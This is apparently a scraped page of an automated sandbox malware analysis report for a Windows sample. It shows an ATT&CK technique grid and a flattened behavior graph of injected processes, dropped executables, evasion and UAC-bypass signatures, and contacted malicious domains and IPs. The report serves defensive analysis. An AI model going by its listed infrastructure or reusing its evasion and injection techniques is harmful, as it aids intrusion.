                  Hidden Files and Directories                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Regsvr32                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                  Bootkit                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1389368 Sample: ccQGH1mKws.exe Startdate: 08/02/2024 Architecture: WINDOWS Score: 100 125 b04rd.xyz 2->125 127 relay.lsoccaz.b04rd.xyz 2->127 129 338 other IPs or domains 2->129 161 Snort IDS alert for network traffic 2->161 163 Found malware configuration 2->163 165 Malicious sample detected (through community Yara rule) 2->165 169 17 other signatures 2->169 12 ccQGH1mKws.exe 2->12         started        15 afratej 2->15         started        17 svchost.exe 2->17         started        19 2 other processes 2->19 signatures3 167 Performs DNS queries to domains with low reputation 127->167 process4 signatures5 191 Detected unpacking (changes PE section rights) 12->191 193 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->193 195 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->195 197 Creates a thread in another existing process (thread injection) 12->197 21 explorer.exe 92 26 12->21 injected 199 Multi AV Scanner detection for dropped file 15->199 201 Maps a DLL or memory area into another process 15->201 203 Checks if the current machine is a virtual machine (disk enumeration) 15->203 26 WerFault.exe 17->26         started        process6 dnsIp7 137 winoui.com 21->137 139 my.account.sony.com 21->139 141 7 other IPs or domains 21->141 95 C:\Users\user\AppData\Roaming\vfratej, PE32 21->95 dropped 97 C:\Users\user\AppData\Roaming\afratej, PE32 21->97 dropped 99 C:\Users\user\AppData\Local\Temp33F.exe, PE32 21->99 dropped 101 9 other malicious files 21->101 dropped 171 System process connects to network (likely due to code injection or exploit) 21->171 173 Benign windows process drops PE files 21->173 175 Deletes itself after installation 21->175 177 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->177 28 A6A0.exe 21->28         started        31 BB62.exe 21->31         started        34 DC49.exe 21->34         started        36 5 other processes 21->36 file8 signatures9 process10 dnsIp11 117 C:\Users\user\AppData\Local\Temp\...\A6A0.tmp, PE32 28->117 dropped 39 A6A0.tmp 28->39         started        119 C:\Users\user\AppData\...\InstallSetup4.exe, PE32 31->119 dropped 121 C:\Users\user\AppData\Local\...\FourthX.exe, PE32+ 31->121 dropped 123 C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32 31->123 dropped 207 Multi AV Scanner detection for dropped file 31->207 41 InstallSetup4.exe 31->41         started        46 288c47bbc1871b439df19ff4df68f076.exe 31->46         started        48 FourthX.exe 31->48         started        209 Detected unpacking (changes PE section rights) 34->209 211 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 34->211 213 Maps a DLL or memory area into another process 34->213 221 2 other signatures 34->221 131 104.21.83.220 CLOUDFLARENETUS United States 36->131 133 172.67.152.52, 443, 49716 CLOUDFLARENETUS United States 36->133 135 3 other IPs or domains 36->135 215 Machine Learning detection for dropped file 36->215 217 Contains functionality to infect the boot sector 36->217 219 Contains functionality to inject code into remote processes 36->219 223 2 other signatures 36->223 50 regsvr32.exe 36->50         started        52 8837.exe 3 16 36->52         started        54 WerFault.exe 36->54         started        56 csrss.exe 36->56         started        file12 signatures13 process14 dnsIp15 58 A6A0.exe 39->58         started        143 185.172.128.90 NADYMSS-ASRU Russian Federation 41->143 145 5.42.64.33 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 41->145 147 185.172.128.127 NADYMSS-ASRU Russian Federation 41->147 103 C:\Users\user\AppData\Local\...\nsfDE87.tmp, PE32 41->103 dropped 105 C:\Users\user\AppData\Local\...\INetC.dll, PE32 41->105 dropped 107 C:\Users\user\AppData\...\BroomSetup.exe, PE32 41->107 dropped 109 C:\Users\user\AppData\...\syncUpd[1].exe, PE32 41->109 dropped 179 Multi AV Scanner detection for dropped file 41->179 61 BroomSetup.exe 41->61         started        181 Detected unpacking (changes PE section rights) 46->181 183 Detected unpacking (overwrites its own PE header) 46->183 185 UAC bypass detected (Fodhelper) 46->185 187 Suspicious powershell command line found 48->187 64 powershell.exe 48->64         started        189 Tries to detect sandboxes / dynamic malware analysis system (file name check) 50->189 149 86.59.21.38 UTA-ASAT Austria 52->149 151 124.168.18.172 TPG-INTERNET-APTPGTelecomLimitedAU Australia 52->151 153 38 other IPs or domains 52->153 111 C:\ProgramData\Drivers\csrss.exe, PE32 52->111 dropped file16 signatures17 process18 file19 113 C:\Users\user\AppData\Local\Temp\...\A6A0.tmp, PE32 58->113 dropped 66 A6A0.tmp 58->66         started        205 Multi AV Scanner detection for dropped file 61->205 69 cmd.exe 61->69         started        71 FourthX.exe 64->71         started        73 conhost.exe 64->73         started        signatures20 process21 file22 85 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 66->85 dropped 87 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 66->87 dropped 89 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 66->89 dropped 93 31 other files (28 malicious) 66->93 dropped 75 anyburnfree.exe 66->75         started        78 anyburnfree.exe 66->78         started        81 conhost.exe 69->81         started        83 chcp.com 69->83         started        91 C:\ProgramData\...\vueqjgslwynd.exe, PE32+ 71->91 dropped process23 dnsIp24 115 C:\ProgramData\...\IMAP List Mailboxes 65.exe, PE32 75->115 dropped 155 185.196.8.22 SIMPLECARRER2IT Switzerland 78->155 157 88.80.145.14 GWHOSTRO Bulgaria 78->157 159 6 other IPs or domains 78->159 file25

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.